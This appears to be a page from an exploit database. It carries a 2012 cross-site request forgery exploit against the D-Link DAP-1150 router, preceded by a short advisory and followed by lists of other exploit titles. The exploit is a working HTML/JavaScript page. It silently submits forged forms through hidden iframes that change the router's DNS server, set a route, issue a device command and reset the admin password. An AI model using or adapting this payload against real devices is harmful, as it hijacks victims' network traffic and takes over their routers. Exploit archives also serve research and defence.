Menu

Search for hundreds of thousands of exploits

"D-Link DAP-1150 1.2.94 - Cross-Site Request Forgery"

Author

Exploit author

MustLive

Platform

Exploit platform

hardware

Release date

Exploit published date

2012-02-13

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
source: https://www.securityfocus.com/bid/51985/info

D-Link DAP-1150 is prone to a cross-site request-forgery vulnerability.

Exploiting this issue may allow a remote attacker to perform certain administrative actions and gain unauthorized access to the affected device. Other attacks are also possible.

D-Link DAP-1150 firmware version 1.2.94 is vulnerable; other versions may also be affected. 

<html>
<head>
<title>Exploit for D-Link DAP 1150. Made by MustLive.
http://websecurity.com.ua</title>
</head>
<body onLoad="StartCSRF()">
<script>
function StartCSRF() {
for (var i=1;i<=3;i++) {
var ifr = document.createElement("iframe");
ifr.setAttribute(&#039;name&#039;, &#039;csrf&#039;+i);
ifr.setAttribute(&#039;width&#039;, &#039;0&#039;);
ifr.setAttribute(&#039;height&#039;, &#039;0&#039;);
document.body.appendChild(ifr);
}
CSRF1();
setTimeout(CSRF2,1000);
setTimeout(CSRF3,2000);
}
function CSRF1() {
window.frames["csrf3"].document.body.innerHTML = &#039;<form name="hack"
action="http://www.example.com/index.cgi"; method="get">\n<input type="hidden"
name="v2" value="y">\n<input type="hidden" name="rq" value="y">\n<input
type="hidden" name="res_json" value="y">\n<input type="hidden"
name="res_data_type" value="json">\n<input type="hidden"
name="res_config_action" value="3">\n<input type="hidden"
name="res_config_id" value="7">\n<input type="hidden" name="res_struct_size"
value="0">\n<input type="hidden" name="res_buf"
value="{%22manual%22:true,%20%22ifname%22:%22%22,%20%22servers%22:%2250.50.50.50%22,%20%22defroute%22:true}">\n</form>&#039;;
window.frames["csrf3"].document.hack.submit();
}
function CSRF2() {
window.frames["csrf4"].document.body.innerHTML = &#039;<form name="hack"
action="http://www.example.com/index.cgi"; method="get">\n<input type="hidden"
name="res_cmd" value="20">\n<input type="hidden" name="res_buf"
value="null">\n<input type="hidden" name="res_cmd_type" value="bl">\n<input
type="hidden" name="v2" value="y">\n<input type="hidden" name="rq"
value="y">\n</form>&#039;;
window.frames["csrf4"].document.hack.submit();
}
function CSRF3() {
window.frames["csrf2"].document.body.innerHTML = &#039;<form name="hack"
action="http://www.example.com/index.cgi"; method="get">\n<input type="hidden"
name="v2" value="y">\n<input type="hidden" name="rq" value="y">\n<input
type="hidden" name="res_config_action" value="3">\n<input type="hidden"
name="res_config_id" value="69">\n<input type="hidden"
name="res_struct_size" value="1">\n<input type="hidden" name="res_buf"
value="password|">\n</form>&#039;;
window.frames["csrf2"].document.hack.submit();
}
</script>
</body>
</html>
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-11-30 "ATX MiniCMTS200a Broadband Gateway 2.0 - Credential Disclosure" webapps hardware "Zagros Bingol"
2020-11-30 "Intelbras Router RF 301K 1.1.2 - Authentication Bypass" webapps hardware "Kaio Amaral"
2020-11-27 "Ruckus IoT Controller (Ruckus vRIoT) 1.5.1.0.21 - Remote Code Execution" webapps hardware "Emre SUREN"
2020-11-24 "Seowon 130-SLC router 1.0.11 - 'ipAddr' RCE (Authenticated)" webapps hardware maj0rmil4d
2020-11-23 "TP-Link TL-WA855RE V5_200415 - Device Reset Auth Bypass" webapps hardware malwrforensics
2020-11-19 "Fortinet FortiOS 6.0.4 - Unauthenticated SSL VPN User Password Modification" webapps hardware "Ricardo Longatto"
2020-11-19 "Genexis Platinum 4410 Router 2.1 - UPnP Credential Exposure" remote hardware "Nitesh Surana"
2020-11-16 "Cisco 7937G - DoS/Privilege Escalation" remote hardware "Cody Martin"
2020-11-13 "ASUS TM-AC1900 - Arbitrary Command Execution (Metasploit)" webapps hardware b1ack0wl
2020-11-13 "Citrix ADC NetScaler - Local File Inclusion (Metasploit)" webapps hardware "RAMELLA Sebastien"
Release Date Title Type Platform Author
2014-07-13 "WordPress Plugin DZS-VideoGallery - Cross-Site Scripting / Command Injection" webapps php MustLive
2013-12-17 "WordPress 2.0.11 - '/wp-admin/options-discussion.php' Script Cross-Site Request Forgery" webapps php MustLive
2013-09-19 "WordPress Plugin RokMicroNews - 'thumb.php' Multiple Vulnerabilities" webapps php MustLive
2013-09-19 "WordPress Plugin RokIntroScroller - 'thumb.php' Multiple Vulnerabilities" webapps php MustLive
2013-09-18 "WordPress Plugin RokNewsPager - 'thumb.php' Multiple Vulnerabilities" webapps php MustLive
2013-09-17 "WordPress Plugin RokStories - 'thumb.php' Multiple Vulnerabilities" webapps php MustLive
2013-07-16 "MCImageManager - Multiple Vulnerabilities" webapps php MustLive
2013-04-21 "WordPress Theme Colormix - Multiple Vulnerabilities" webapps php MustLive
2013-04-13 "Aibolit - Information Disclosure" webapps multiple MustLive
2013-03-26 "IBM Lotus Domino 8.5.x - 'x.nsf' Multiple Cross-Site Scripting Vulnerabilities" remote multiple MustLive
2013-03-10 "SWFupload - Multiple Content Spoofing / Cross-Site Scripting Vulnerabilities" webapps php MustLive
2013-03-01 "Question2Answer - Cross-Site Request Forgery" webapps php MustLive
2013-02-20 "ZeroClipboard 1.9.x - 'id' Cross-Site Scripting" webapps php MustLive
2013-02-02 "WordPress Theme flashnews - Multiple Input Validation Vulnerabilities" webapps php MustLive
2013-01-09 "TinyBrowser - 'tinybrowser.php' Directory Listing" webapps php MustLive
2013-01-09 "tinybrowser - 'type' Cross-Site Scripting" webapps php MustLive
2013-01-09 "TinyBrowser - 'edit.php' Directory Listing" webapps php MustLive
2012-12-17 "WordPress Plugin RokBox Plugin - '/wp-content/plugins/wp_rokbox/jwplayer/jwplayer.swf?abouttext' Cross-Site Scripting" webapps php MustLive
2012-10-28 "CorePlayer - 'callback' Cross-Site Scripting" webapps php MustLive
2012-10-18 "WordPress Plugin Wordfence Security - Cross-Site Scripting" webapps php MustLive
2012-09-28 "IBM Lotus Notes Traveler 8.5.1.x - Multiple Input Validation Vulnerabilities" remote multiple MustLive
2012-09-15 "IFOBS - 'regclientprint.jsp' Multiple HTML Injection Vulnerabilities" webapps jsp MustLive
2012-08-29 "JW Player - 'logo.link' Cross-Site Scripting" webapps php MustLive
2012-07-29 "JW Player - 'playerready' Cross-Site Scripting" webapps php MustLive
2012-06-29 "LIOOSYS CMS - SQL Injection / Information Disclosure" webapps php MustLive
2012-06-15 "WordPress Plugin ORGanizer - Multiple Vulnerabilities" webapps php MustLive
2012-05-21 "Yandex.Server 2010 9.0 - 'text' Cross-Site Scripting" webapps php MustLive
2012-03-11 "EJBCA 4.0.7 - 'issuer' Cross-Site Scripting" webapps java MustLive
2012-02-26 "Webglimpse 2.x - Multiple Cross-Site Scripting Vulnerabilities" webapps php MustLive
2012-02-13 "D-Link DAP-1150 1.2.94 - Cross-Site Request Forgery" remote hardware MustLive
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.